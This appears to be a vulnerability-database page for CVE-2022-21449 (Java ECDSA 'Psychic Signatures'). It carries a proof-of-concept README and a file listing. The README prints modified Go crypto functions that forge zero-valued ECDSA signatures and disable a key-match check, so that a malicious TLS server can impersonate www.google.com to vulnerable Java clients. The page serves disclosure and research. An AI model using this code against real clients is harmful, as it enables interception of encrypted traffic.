关联漏洞
标题:
Oracle Java SE 输入验证错误漏洞
(CVE-2022-21449)
描述:Oracle Java SE是美国甲骨文(Oracle)公司的一款用于开发和部署桌面、服务器以及嵌入设备和实时环境中的Java应用程序。 Oracle Java SE 中存在输入验证错误漏洞,该漏洞允许未经身份验证的攻击者通过多种协议进行网络访问,从而破坏 Oracle Java SE、Oracle GraalVM 企业版。成功攻击此漏洞可能导致对关键数据或所有 Oracle Java SE、Oracle GraalVM 企业版可访问数据的未经授权的创建、删除或修改访问。
描述
CVE-2022-21449 Proof of Concept demonstrating its usage with a client running on a vulnerable Java version and a malicious TLS server
介绍
# CVE-2022-21449-TLS-PoC
CVE-2022-21449 ([also dubbed Psychic Signatures in the vulnerability writeup by Neil Madden](https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/)) Proof of Concept demonstrating its usage with a vulnerable client and a malicious TLS server.
The malicious server presents a valid (as of 2022-04-20) cert chain for www.google.com which has an ECDSA pub key (secp256r1). However, the `crypto/ecdsa` package has been modified to present an invalid signature with `r = s = 0`. The vulnerable client accepts this invalid signature, allowing the rest of the TLS handshake to continue.
Aside from the removed `*_test.go` files while building & exploration, [these modifications to the golang crypto library](#modifications-to-the-golang-crypto-library) were necessary for the malicious TLS server. They can also be found by searching/grepping for `CVE-2022-21449` in the `go/src` directory.
# Building
Requires some existing golang installation as well as maven, then run `./build.sh`.
Tested on Ubuntu 20.04.4 LTS (WSL2) with OpenJDK 16.0.1 (build 16.0.1+9-Ubuntu-120.04, 2021-04-20)
# Demo
https://user-images.githubusercontent.com/7225227/164332612-832b046b-cd2e-46e8-b3d6-1da36e290992.mp4
# Modifications to the golang crypto library
In `crypto/ecdsa/ecdsa.go`, the function `signGeneric` was essentially modified to:
```go
func signGeneric(priv *PrivateKey, csprng *cipher.StreamReader, c elliptic.Curve, hash []byte) (r, s *big.Int, err error) {
// SEC 1, Version 2.0, Section 4.1.3
// CVE-2022-21449 - Modified and removed all calculations. Return r = s = 0
r = new(big.Int)
s = new(big.Int)
return
}
```
And in `crypto/tls/tls.go`, the function `X509KeyPair` has been changed to disable verification checks that a given private key matches the X.509 certificate's public key for ECDSA public keys:
```go
// X509KeyPair parses a public/private key pair from a pair of
// PEM encoded data. On successful return, Certificate.Leaf will be nil because
// the parsed form of the certificate is not retained.
func X509KeyPair(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
fail := func(err error) (Certificate, error) { return Certificate{}, err }
...
switch pub := x509Cert.PublicKey.(type) {
...
case *ecdsa.PublicKey:
// CVE-2022-21449: Modified checks away
_, ok := cert.PrivateKey.(*ecdsa.PrivateKey)
if !ok {
return fail(errors.New("tls: private key type does not match public key type"))
}
/*if pub.X.Cmp(priv.X) != 0 || pub.Y.Cmp(priv.Y) != 0 {
return fail(errors.New("tls: private key does not match public key"))
}*/
...
}
```
# Credits
- [Neil Madden](https://twitter.com/neilmaddog): finding and disclosing CVE-2022-21449, as [detailed in their excellent writeup](https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/).
- [Khaled Nassar](https://twitter.com/kmhnassar): This PoC.
文件快照
[4.0K] /data/pocs/057e837881fbb1bb7d4d62cb2954bbe085ed162e
├── [4.0K] bin
│ ├── [10.0K] server.crt
│ └── [ 302] server.key
├── [ 364] build.sh
├── [4.0K] go
│ ├── [4.0K] api
│ │ ├── [ 30K] except.txt
│ │ ├── [ 30K] go1.10.txt
│ │ ├── [ 25K] go1.11.txt
│ │ ├── [ 14K] go1.12.txt
│ │ ├── [453K] go1.13.txt
│ │ ├── [9.3K] go1.14.txt
│ │ ├── [7.6K] go1.15.txt
│ │ ├── [ 25K] go1.16.txt
│ │ ├── [ 16K] go1.17.txt
│ │ ├── [ 12K] go1.18.txt
│ │ ├── [2.6M] go1.1.txt
│ │ ├── [1.9M] go1.2.txt
│ │ ├── [117K] go1.3.txt
│ │ ├── [ 34K] go1.4.txt
│ │ ├── [ 47K] go1.5.txt
│ │ ├── [ 13K] go1.6.txt
│ │ ├── [ 14K] go1.7.txt
│ │ ├── [ 16K] go1.8.txt
│ │ ├── [ 11K] go1.9.txt
│ │ ├── [1.7M] go1.txt
│ │ ├── [4.0K] next
│ │ │ ├── [ 60] 35044.txt
│ │ │ ├── [ 116] 42710.txt
│ │ │ ├── [ 65] 45628.txt
│ │ │ ├── [ 205] 45754.txt
│ │ │ ├── [ 65] 46057.txt
│ │ │ ├── [ 52] 46059.txt
│ │ │ ├── [ 137] 46121.txt
│ │ │ ├── [5.5K] 46229.txt
│ │ │ ├── [ 128] 47005.txt
│ │ │ ├── [ 59] 50340.txt
│ │ │ ├── [ 482] 50601.txt
│ │ │ ├── [ 680] 50674.txt
│ │ │ ├── [3.6K] 51082.txt
│ │ │ ├── [ 50] 51414.txt
│ │ │ ├── [ 142] 51644.txt
│ │ │ ├── [2.3K] 51868.txt
│ │ │ └── [ 125] regexpdepth.txt
│ │ └── [1.1K] README
│ ├── [ 55K] AUTHORS
│ ├── [ 15] codereview.cfg
│ ├── [1.3K] CONTRIBUTING.md
│ ├── [109K] CONTRIBUTORS
│ ├── [4.0K] doc
│ │ ├── [ 36K] asm.html
│ │ ├── [211K] go1.17_spec.html
│ │ ├── [5.4K] go1.19.html
│ │ ├── [ 13K] go_mem.html
│ │ └── [253K] go_spec.html
│ ├── [4.0K] lib
│ │ └── [4.0K] time
│ │ ├── [ 390] README
│ │ ├── [ 952] update.bash
│ │ └── [416K] zoneinfo.zip
│ ├── [1.4K] LICENSE
│ ├── [4.0K] misc
│ │ ├── [4.0K] android
│ │ │ ├── [10.0K] go_android_exec.go
│ │ │ └── [ 732] README
│ │ ├── [4.0K] arm
│ │ │ └── [1.7K] a
│ │ ├── [4.0K] cgo
│ │ │ ├── [4.0K] errors
│ │ │ │ ├── [3.0K] argposition_test.go
│ │ │ │ ├── [5.4K] badsym_test.go
│ │ │ │ ├── [3.4K] errors_test.go
│ │ │ │ ├── [ 19K] ptr_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 404] err1.go
│ │ │ │ ├── [2.5K] err2.go
│ │ │ │ ├── [ 259] err4.go
│ │ │ │ ├── [ 279] issue11097a.go
│ │ │ │ ├── [ 278] issue11097b.go
│ │ │ │ ├── [ 368] issue14669.go
│ │ │ │ ├── [ 390] issue18452.go
│ │ │ │ ├── [ 70] issue18889.go
│ │ │ │ ├── [ 555] issue28069.go
│ │ │ │ ├── [ 506] issue28721.go
│ │ │ │ ├── [ 373] issue33061.go
│ │ │ │ ├── [1.3K] issue42580.go
│ │ │ │ ├── [ 305] long_double_size.go
│ │ │ │ └── [ 766] malloc.go
│ │ │ ├── [4.0K] fortran
│ │ │ │ ├── [ 294] answer.f90
│ │ │ │ ├── [ 263] fortran.go
│ │ │ │ ├── [ 333] fortran_test.go
│ │ │ │ ├── [4.0K] helloworld
│ │ │ │ │ └── [ 100] helloworld.f90
│ │ │ │ └── [ 870] test.bash
│ │ │ ├── [4.0K] gmp
│ │ │ │ ├── [ 936] fib.go
│ │ │ │ ├── [9.5K] gmp.go
│ │ │ │ └── [1.3K] pi.go
│ │ │ ├── [4.0K] life
│ │ │ │ ├── [1.5K] life_test.go
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [1.4K] c-life.c
│ │ │ │ ├── [ 898] life.go
│ │ │ │ ├── [ 292] life.h
│ │ │ │ ├── [ 827] main.go
│ │ │ │ └── [ 272] main.out
│ │ │ ├── [4.0K] nocgo
│ │ │ │ ├── [ 574] nocgo.go
│ │ │ │ └── [ 292] nocgo_test.go
│ │ │ ├── [4.0K] stdio
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ ├── [1.5K] stdio_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 938] chain.go
│ │ │ │ ├── [ 115] chain.out
│ │ │ │ ├── [ 989] fib.go
│ │ │ │ ├── [ 962] fib.out
│ │ │ │ ├── [ 309] hello.go
│ │ │ │ ├── [ 13] hello.out
│ │ │ │ ├── [1.1K] run.out
│ │ │ │ └── [4.0K] stdio
│ │ │ │ ├── [ 874] file.go
│ │ │ │ └── [ 613] stdio.go
│ │ │ ├── [4.0K] test
│ │ │ │ ├── [ 307] backdoor.go
│ │ │ │ ├── [1.7K] buildid_linux.go
│ │ │ │ ├── [1.3K] callback_c.c
│ │ │ │ ├── [ 591] callback_c_gc.c
│ │ │ │ ├── [ 451] callback_c_gccgo.c
│ │ │ │ ├── [111K] callback.go
│ │ │ │ ├── [ 474] cgo_linux_test.go
│ │ │ │ ├── [ 359] cgo_stubs_android_test.go
│ │ │ │ ├── [5.9K] cgo_test.go
│ │ │ │ ├── [ 964] cgo_thread_lock.go
│ │ │ │ ├── [ 403] cgo_unix_test.go
│ │ │ │ ├── [ 682] cthread_unix.c
│ │ │ │ ├── [ 750] cthread_windows.c
│ │ │ │ ├── [6.9K] issue1435.go
│ │ │ │ ├── [2.8K] issue18146.go
│ │ │ │ ├── [ 459] issue20910.c
│ │ │ │ ├── [ 340] issue21897b.go
│ │ │ │ ├── [1.4K] issue21897.go
│ │ │ │ ├── [ 299] issue31891.c
│ │ │ │ ├── [ 791] issue4029.c
│ │ │ │ ├── [1.7K] issue4029.go
│ │ │ │ ├── [ 364] issue4029w.go
│ │ │ │ ├── [ 306] issue42018.go
│ │ │ │ ├── [1.1K] issue42018_windows.go
│ │ │ │ ├── [ 366] issue42495.go
│ │ │ │ ├── [ 374] issue4273b.c
│ │ │ │ ├── [ 320] issue4273.c
│ │ │ │ ├── [ 222] issue4339.c
│ │ │ │ ├── [ 153] issue4339.h
│ │ │ │ ├── [ 454] issue5548_c.c
│ │ │ │ ├── [ 223] issue5740a.c
│ │ │ │ ├── [ 223] issue5740b.c
│ │ │ │ ├── [ 303] issue6833_c.c
│ │ │ │ ├── [ 274] issue6907export_c.c
│ │ │ │ ├── [ 535] issue6997_linux.c
│ │ │ │ ├── [ 898] issue6997_linux.go
│ │ │ │ ├── [ 634] issue7234_test.go
│ │ │ │ ├── [ 256] issue8148.c
│ │ │ │ ├── [ 526] issue8148.go
│ │ │ │ ├── [ 198] issue8331.h
│ │ │ │ ├── [ 305] issue8517.go
│ │ │ │ ├── [ 517] issue8517_windows.c
│ │ │ │ ├── [ 990] issue8517_windows.go
│ │ │ │ ├── [ 966] issue8694.go
│ │ │ │ ├── [ 216] issue8811.c
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ ├── [1.9K] pkg_test.go
│ │ │ │ ├── [ 843] setgid_linux.go
│ │ │ │ ├── [1.8K] sigaltstack.go
│ │ │ │ ├── [1.0K] sigprocmask.c
│ │ │ │ ├── [ 827] sigprocmask.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [ 239] cgo_linux_test.go
│ │ │ │ │ ├── [ 634] cgo_test.go
│ │ │ │ │ ├── [4.0K] gcc68255
│ │ │ │ │ │ ├── [ 378] a.go
│ │ │ │ │ │ ├── [ 206] c.c
│ │ │ │ │ │ └── [ 184] c.h
│ │ │ │ │ ├── [ 331] gcc68255.go
│ │ │ │ │ ├── [4.0K] issue20266
│ │ │ │ │ │ └── [ 251] issue20266.h
│ │ │ │ │ ├── [ 463] issue20266.go
│ │ │ │ │ ├── [4.0K] issue23555a
│ │ │ │ │ │ └── [ 250] a.go
│ │ │ │ │ ├── [4.0K] issue23555b
│ │ │ │ │ │ └── [ 250] a.go
│ │ │ │ │ ├── [ 360] issue23555.go
│ │ │ │ │ ├── [4.0K] issue24161arg
│ │ │ │ │ │ ├── [ 381] def.go
│ │ │ │ │ │ └── [ 397] use.go
│ │ │ │ │ ├── [ 630] issue24161_darwin_test.go
│ │ │ │ │ ├── [4.0K] issue24161e0
│ │ │ │ │ │ └── [ 918] main.go
│ │ │ │ │ ├── [4.0K] issue24161e1
│ │ │ │ │ │ └── [1.0K] main.go
│ │ │ │ │ ├── [4.0K] issue24161e2
│ │ │ │ │ │ └── [1.0K] main.go
│ │ │ │ │ ├── [4.0K] issue24161res
│ │ │ │ │ │ └── [ 485] restype.go
│ │ │ │ │ ├── [4.0K] issue26213
│ │ │ │ │ │ ├── [ 874] jni.h
│ │ │ │ │ │ └── [ 835] test26213.go
│ │ │ │ │ ├── [4.0K] issue26430
│ │ │ │ │ │ ├── [ 260] a.go
│ │ │ │ │ │ └── [ 261] b.go
│ │ │ │ │ ├── [ 329] issue26430.go
│ │ │ │ │ ├── [4.0K] issue26743
│ │ │ │ │ │ ├── [ 271] a.go
│ │ │ │ │ │ └── [ 206] b.go
│ │ │ │ │ ├── [ 326] issue26743.go
│ │ │ │ │ ├── [4.0K] issue27054
│ │ │ │ │ │ ├── [ 255] egl.h
│ │ │ │ │ │ └── [ 393] test27054.go
│ │ │ │ │ ├── [4.0K] issue27340
│ │ │ │ │ │ └── [1.2K] a.go
│ │ │ │ │ ├── [ 347] issue27340.go
│ │ │ │ │ ├── [4.0K] issue29563
│ │ │ │ │ │ ├── [ 257] weak1.c
│ │ │ │ │ │ ├── [ 257] weak2.c
│ │ │ │ │ │ └── [ 277] weak.go
│ │ │ │ │ ├── [ 341] issue29563.go
│ │ │ │ │ ├── [4.0K] issue30527
│ │ │ │ │ │ ├── [ 394] a.go
│ │ │ │ │ │ └── [ 211] b.go
│ │ │ │ │ ├── [ 346] issue30527.go
│ │ │ │ │ ├── [4.0K] issue41761a
│ │ │ │ │ │ └── [ 248] a.go
│ │ │ │ │ ├── [ 342] issue41761.go
│ │ │ │ │ ├── [4.0K] issue43639
│ │ │ │ │ │ └── [ 224] a.go
│ │ │ │ │ ├── [ 300] issue43639.go
│ │ │ │ │ ├── [4.0K] issue8756
│ │ │ │ │ │ └── [ 101] issue8756.go
│ │ │ │ │ ├── [ 177] issue8756.go
│ │ │ │ │ ├── [4.0K] issue8828
│ │ │ │ │ │ ├── [ 175] issue8828.c
│ │ │ │ │ │ └── [ 69] trivial.go
│ │ │ │ │ ├── [ 364] issue8828.go
│ │ │ │ │ ├── [4.0K] issue9026
│ │ │ │ │ │ └── [ 947] issue9026.go
│ │ │ │ │ ├── [ 112] issue9026.go
│ │ │ │ │ ├── [4.0K] issue9400
│ │ │ │ │ │ ├── [ 574] asm_386.s
│ │ │ │ │ │ ├── [ 590] asm_amd64x.s
│ │ │ │ │ │ ├── [ 759] asm_arm64.s
│ │ │ │ │ │ ├── [ 757] asm_arm.s
│ │ │ │ │ │ ├── [ 693] asm_mips64x.s
│ │ │ │ │ │ ├── [ 664] asm_mipsx.s
│ │ │ │ │ │ ├── [ 669] asm_ppc64x.s
│ │ │ │ │ │ ├── [ 666] asm_riscv64.s
│ │ │ │ │ │ ├── [ 579] asm_s390x.s
│ │ │ │ │ │ ├── [ 611] gccgo.go
│ │ │ │ │ │ └── [ 233] stubs.go
│ │ │ │ │ ├── [1.7K] issue9400_linux.go
│ │ │ │ │ ├── [4.0K] issue9510a
│ │ │ │ │ │ └── [ 253] a.go
│ │ │ │ │ ├── [4.0K] issue9510b
│ │ │ │ │ │ └── [ 253] b.go
│ │ │ │ │ ├── [ 525] issue9510.go
│ │ │ │ │ └── [ 281] test26213.go
│ │ │ │ ├── [ 47K] test.go
│ │ │ │ ├── [ 277] test_unix.go
│ │ │ │ ├── [ 234] test_windows.go
│ │ │ │ ├── [ 582] testx.c
│ │ │ │ ├── [ 11K] testx.go
│ │ │ │ └── [ 353] typeparam.go
│ │ │ ├── [4.0K] testasan
│ │ │ │ └── [1.1K] main.go
│ │ │ ├── [4.0K] testcarchive
│ │ │ │ ├── [ 29K] carchive_test.go
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.0K] libgo
│ │ │ │ │ └── [ 977] libgo.go
│ │ │ │ ├── [4.0K] libgo2
│ │ │ │ │ └── [1.4K] libgo2.go
│ │ │ │ ├── [4.0K] libgo3
│ │ │ │ │ └── [1008] libgo3.go
│ │ │ │ ├── [4.0K] libgo4
│ │ │ │ │ └── [ 845] libgo4.go
│ │ │ │ ├── [4.0K] libgo6
│ │ │ │ │ └── [ 404] sigprof.go
│ │ │ │ ├── [4.0K] libgo7
│ │ │ │ │ └── [ 291] sink.go
│ │ │ │ ├── [4.0K] libgo8
│ │ │ │ │ └── [ 529] a.go
│ │ │ │ ├── [4.7K] main2.c
│ │ │ │ ├── [3.9K] main3.c
│ │ │ │ ├── [4.5K] main4.c
│ │ │ │ ├── [1.9K] main5.c
│ │ │ │ ├── [ 830] main6.c
│ │ │ │ ├── [ 332] main7.c
│ │ │ │ ├── [ 306] main8.c
│ │ │ │ ├── [ 847] main.c
│ │ │ │ ├── [1.4K] main_unix.c
│ │ │ │ ├── [ 343] main_windows.c
│ │ │ │ └── [4.0K] p
│ │ │ │ └── [ 237] p.go
│ │ │ ├── [4.0K] testcshared
│ │ │ │ ├── [ 22K] cshared_test.go
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.0K] go2c2go
│ │ │ │ │ ├── [4.0K] go
│ │ │ │ │ │ └── [ 249] shlib.go
│ │ │ │ │ ├── [4.0K] m1
│ │ │ │ │ │ ├── [ 238] c.c
│ │ │ │ │ │ └── [ 380] main.go
│ │ │ │ │ └── [4.0K] m2
│ │ │ │ │ └── [ 374] main.go
│ │ │ │ ├── [4.0K] issue36233
│ │ │ │ │ └── [ 629] issue36233.go
│ │ │ │ ├── [4.0K] libgo
│ │ │ │ │ └── [ 767] libgo.go
│ │ │ │ ├── [4.0K] libgo2
│ │ │ │ │ ├── [ 338] dup2.go
│ │ │ │ │ ├── [ 305] dup3.go
│ │ │ │ │ └── [1.1K] libgo2.go
│ │ │ │ ├── [4.0K] libgo4
│ │ │ │ │ └── [ 858] libgo4.go
│ │ │ │ ├── [4.0K] libgo5
│ │ │ │ │ └── [ 815] libgo5.go
│ │ │ │ ├── [1.1K] main0.c
│ │ │ │ ├── [1.7K] main1.c
│ │ │ │ ├── [1.2K] main2.c
│ │ │ │ ├── [ 785] main3.c
│ │ │ │ ├── [4.1K] main4.c
│ │ │ │ ├── [3.5K] main5.c
│ │ │ │ └── [4.0K] p
│ │ │ │ └── [ 299] p.go
│ │ │ ├── [4.0K] testgodefs
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [ 516] anonunion.go
│ │ │ │ │ ├── [ 839] bitfields.go
│ │ │ │ │ ├── [ 351] fieldtypedef.go
│ │ │ │ │ ├── [ 378] issue37479.go
│ │ │ │ │ ├── [ 327] issue37621.go
│ │ │ │ │ ├── [ 308] issue38649.go
│ │ │ │ │ ├── [ 259] issue39534.go
│ │ │ │ │ ├── [ 315] issue48396.go
│ │ │ │ │ ├── [ 352] issue8478.go
│ │ │ │ │ └── [1.3K] main.go
│ │ │ │ └── [2.8K] testgodefs_test.go
│ │ │ ├── [4.0K] testplugin
│ │ │ │ ├── [4.0K] altpath
│ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ ├── [4.0K] common
│ │ │ │ │ │ └── [ 210] common.go
│ │ │ │ │ └── [4.0K] plugin-mismatch
│ │ │ │ │ └── [ 466] main.go
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ ├── [9.5K] plugin_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.0K] checkdwarf
│ │ │ │ │ └── [1.8K] main.go
│ │ │ │ ├── [4.0K] common
│ │ │ │ │ └── [ 210] common.go
│ │ │ │ ├── [4.0K] forkexec
│ │ │ │ │ └── [ 502] main.go
│ │ │ │ ├── [4.0K] host
│ │ │ │ │ └── [4.9K] host.go
│ │ │ │ ├── [4.0K] iface
│ │ │ │ │ └── [1.0K] main.go
│ │ │ │ ├── [4.0K] iface_a
│ │ │ │ │ └── [ 332] a.go
│ │ │ │ ├── [4.0K] iface_b
│ │ │ │ │ └── [ 332] b.go
│ │ │ │ ├── [4.0K] iface_i
│ │ │ │ │ └── [ 263] i.go
│ │ │ │ ├── [4.0K] issue18584
│ │ │ │ │ ├── [ 424] main.go
│ │ │ │ │ └── [ 326] plugin.go
│ │ │ │ ├── [4.0K] issue18676
│ │ │ │ │ ├── [4.0K] dynamodbstreamsevt
│ │ │ │ │ │ └── [ 285] definition.go
│ │ │ │ │ ├── [1.1K] main.go
│ │ │ │ │ └── [ 278] plugin.go
│ │ │ │ ├── [4.0K] issue19418
│ │ │ │ │ ├── [ 511] main.go
│ │ │ │ │ └── [ 196] plugin.go
│ │ │ │ ├── [4.0K] issue19529
│ │ │ │ │ └── [ 171] plugin.go
│ │ │ │ ├── [4.0K] issue19534
│ │ │ │ │ ├── [ 411] main.go
│ │ │ │ │ └── [ 204] plugin.go
│ │ │ │ ├── [4.0K] issue22175
│ │ │ │ │ ├── [ 510] main.go
│ │ │ │ │ ├── [ 390] plugin1.go
│ │ │ │ │ └── [ 218] plugin2.go
│ │ │ │ ├── [4.0K] issue22295.pkg
│ │ │ │ │ ├── [ 485] main.go
│ │ │ │ │ └── [ 271] plugin.go
│ │ │ │ ├── [4.0K] issue24351
│ │ │ │ │ ├── [ 389] main.go
│ │ │ │ │ └── [ 261] plugin.go
│ │ │ │ ├── [4.0K] issue25756
│ │ │ │ │ ├── [ 928] main.go
│ │ │ │ │ └── [4.0K] plugin
│ │ │ │ │ ├── [1.4K] c-life.c
│ │ │ │ │ ├── [ 886] life.go
│ │ │ │ │ └── [ 292] life.h
│ │ │ │ ├── [4.0K] issue44956
│ │ │ │ │ ├── [4.0K] base
│ │ │ │ │ │ └── [ 205] base.go
│ │ │ │ │ ├── [1.1K] main.go
│ │ │ │ │ ├── [ 228] plugin1.go
│ │ │ │ │ └── [ 267] plugin2.go
│ │ │ │ ├── [4.0K] method
│ │ │ │ │ ├── [ 478] main.go
│ │ │ │ │ └── [ 241] plugin.go
│ │ │ │ ├── [4.0K] method2
│ │ │ │ │ ├── [ 549] main.go
│ │ │ │ │ ├── [4.0K] p
│ │ │ │ │ │ └── [ 213] p.go
│ │ │ │ │ └── [ 260] plugin.go
│ │ │ │ ├── [4.0K] method3
│ │ │ │ │ ├── [ 533] main.go
│ │ │ │ │ ├── [4.0K] p
│ │ │ │ │ │ └── [ 278] p.go
│ │ │ │ │ └── [ 240] plugin.go
│ │ │ │ ├── [4.0K] plugin1
│ │ │ │ │ └── [ 820] plugin1.go
│ │ │ │ ├── [4.0K] plugin2
│ │ │ │ │ └── [ 796] plugin2.go
│ │ │ │ ├── [4.0K] sub
│ │ │ │ │ └── [4.0K] plugin1
│ │ │ │ │ └── [ 395] plugin1.go
│ │ │ │ ├── [4.0K] unnamed1
│ │ │ │ │ └── [ 486] main.go
│ │ │ │ └── [4.0K] unnamed2
│ │ │ │ └── [ 365] main.go
│ │ │ ├── [4.0K] testsanitizers
│ │ │ │ ├── [2.9K] asan_test.go
│ │ │ │ ├── [ 12K] cc_test.go
│ │ │ │ ├── [1.8K] cshared_test.go
│ │ │ │ ├── [1.5K] msan_test.go
│ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ ├── [ 500] asan1_fail.go
│ │ │ │ │ ├── [ 616] asan2_fail.go
│ │ │ │ │ ├── [ 486] asan3_fail.go
│ │ │ │ │ ├── [ 496] asan4_fail.go
│ │ │ │ │ ├── [ 328] asan5_fail.go
│ │ │ │ │ ├── [ 528] asan_unsafe_fail1.go
│ │ │ │ │ ├── [ 550] asan_unsafe_fail2.go
│ │ │ │ │ ├── [ 457] asan_unsafe_fail3.go
│ │ │ │ │ ├── [ 773] asan_useAfterReturn.go
│ │ │ │ │ ├── [ 710] msan2_cmsan.go
│ │ │ │ │ ├── [ 644] msan2.go
│ │ │ │ │ ├── [ 552] msan3.go
│ │ │ │ │ ├── [ 878] msan4.go
│ │ │ │ │ ├── [ 904] msan5.go
│ │ │ │ │ ├── [1.4K] msan6.go
│ │ │ │ │ ├── [ 834] msan7.go
│ │ │ │ │ ├── [2.7K] msan8.go
│ │ │ │ │ ├── [ 701] msan_fail.go
│ │ │ │ │ ├── [ 540] msan.go
│ │ │ │ │ ├── [ 303] msan_shared.go
│ │ │ │ │ ├── [ 798] tsan10.go
│ │ │ │ │ ├── [1.2K] tsan11.go
│ │ │ │ │ ├── [ 926] tsan12.go
│ │ │ │ │ ├── [ 940] tsan2.go
│ │ │ │ │ ├── [ 662] tsan3.go
│ │ │ │ │ ├── [ 634] tsan4.go
│ │ │ │ │ ├── [ 927] tsan5.go
│ │ │ │ │ ├── [ 817] tsan6.go
│ │ │ │ │ ├── [ 708] tsan7.go
│ │ │ │ │ ├── [1.3K] tsan8.go
│ │ │ │ │ ├── [1.3K] tsan9.go
│ │ │ │ │ ├── [ 700] tsan.go
│ │ │ │ │ └── [1.5K] tsan_shared.go
│ │ │ │ └── [1.2K] tsan_test.go
│ │ │ ├── [4.0K] testshared
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ ├── [ 34K] shared_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.0K] dep2
│ │ │ │ │ └── [ 163] dep2.go
│ │ │ │ ├── [4.0K] dep3
│ │ │ │ │ └── [ 503] dep3.go
│ │ │ │ ├── [4.0K] depBase
│ │ │ │ │ ├── [ 249] asm.s
│ │ │ │ │ ├── [ 676] dep.go
│ │ │ │ │ ├── [ 221] gccgo.go
│ │ │ │ │ └── [ 215] stubs.go
│ │ │ │ ├── [4.0K] division
│ │ │ │ │ └── [ 302] division.go
│ │ │ │ ├── [4.0K] exe
│ │ │ │ │ └── [ 906] exe.go
│ │ │ │ ├── [4.0K] exe2
│ │ │ │ │ └── [ 111] exe2.go
│ │ │ │ ├── [4.0K] exe3
│ │ │ │ │ └── [ 67] exe3.go
│ │ │ │ ├── [4.0K] execgo
│ │ │ │ │ └── [ 49] exe.go
│ │ │ │ ├── [4.0K] explicit
│ │ │ │ │ └── [ 91] explicit.go
│ │ │ │ ├── [4.0K] gcdata
│ │ │ │ │ ├── [4.0K] main
│ │ │ │ │ │ └── [ 763] main.go
│ │ │ │ │ └── [4.0K] p
│ │ │ │ │ └── [ 187] p.go
│ │ │ │ ├── [4.0K] global
│ │ │ │ │ └── [1.4K] main.go
│ │ │ │ ├── [4.0K] globallib
│ │ │ │ │ └── [ 485] global.go
│ │ │ │ ├── [4.0K] iface
│ │ │ │ │ └── [ 399] main.go
│ │ │ │ ├── [4.0K] iface_a
│ │ │ │ │ └── [ 335] a.go
│ │ │ │ ├── [4.0K] iface_b
│ │ │ │ │ └── [ 335] b.go
│ │ │ │ ├── [4.0K] iface_i
│ │ │ │ │ └── [ 263] i.go
│ │ │ │ ├── [4.0K] implicit
│ │ │ │ │ └── [ 46] implicit.go
│ │ │ │ ├── [4.0K] implicitcmd
│ │ │ │ │ └── [ 126] implicitcmd.go
│ │ │ │ ├── [4.0K] issue25065
│ │ │ │ │ └── [ 616] a.go
│ │ │ │ ├── [4.0K] issue30768
│ │ │ │ │ ├── [4.0K] issue30768lib
│ │ │ │ │ │ └── [ 276] lib.go
│ │ │ │ │ └── [ 487] x_test.go
│ │ │ │ ├── [4.0K] issue39777
│ │ │ │ │ ├── [4.0K] a
│ │ │ │ │ │ └── [ 224] a.go
│ │ │ │ │ └── [4.0K] b
│ │ │ │ │ └── [ 183] b.go
│ │ │ │ ├── [4.0K] issue44031
│ │ │ │ │ ├── [4.0K] a
│ │ │ │ │ │ └── [ 281] a.go
│ │ │ │ │ ├── [4.0K] b
│ │ │ │ │ │ └── [ 295] b.go
│ │ │ │ │ └── [4.0K] main
│ │ │ │ │ └── [ 373] main.go
│ │ │ │ ├── [4.0K] issue47837
│ │ │ │ │ ├── [4.0K] a
│ │ │ │ │ │ └── [ 308] a.go
│ │ │ │ │ └── [4.0K] main
│ │ │ │ │ └── [ 273] main.go
│ │ │ │ └── [4.0K] trivial
│ │ │ │ └── [ 203] trivial.go
│ │ │ ├── [4.0K] testsigfwd
│ │ │ │ └── [2.0K] main.go
│ │ │ ├── [4.0K] testso
│ │ │ │ ├── [ 229] noso_test.go
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ ├── [3.8K] so_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 325] cgoso.c
│ │ │ │ ├── [1.2K] cgoso_c.c
│ │ │ │ ├── [ 761] cgoso.go
│ │ │ │ ├── [ 412] cgoso_unix.go
│ │ │ │ └── [ 246] main.go
│ │ │ ├── [4.0K] testsovar
│ │ │ │ ├── [ 229] noso_test.go
│ │ │ │ ├── [1.8K] overlaydir_test.go
│ │ │ │ ├── [3.8K] so_test.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 220] cgoso_c.c
│ │ │ │ ├── [ 391] cgoso_c.h
│ │ │ │ ├── [1.1K] cgoso.go
│ │ │ │ └── [ 246] main.go
│ │ │ └── [4.0K] testtls
│ │ │ ├── [ 627] tls.go
│ │ │ ├── [ 281] tls_test.go
│ │ │ └── [ 272] tls_unix.c
│ │ ├── [4.0K] chrome
│ │ │ └── [4.0K] gophertool
│ │ │ ├── [ 265] background.html
│ │ │ ├── [ 286] background.js
│ │ │ ├── [1.2K] gopher.js
│ │ │ ├── [5.5K] gopher.png
│ │ │ ├── [ 378] manifest.json
│ │ │ ├── [ 830] popup.html
│ │ │ ├── [1020] popup.js
│ │ │ └── [ 194] README.txt
│ │ ├── [ 159] editors
│ │ ├── [ 470] go.mod
│ │ ├── [4.0K] ios
│ │ │ ├── [ 626] clangwrap.sh
│ │ │ ├── [3.2K] detect.go
│ │ │ ├── [ 23K] go_ios_exec.go
│ │ │ └── [2.7K] README
│ │ ├── [4.0K] linkcheck
│ │ │ └── [3.9K] linkcheck.go
│ │ ├── [4.0K] reboot
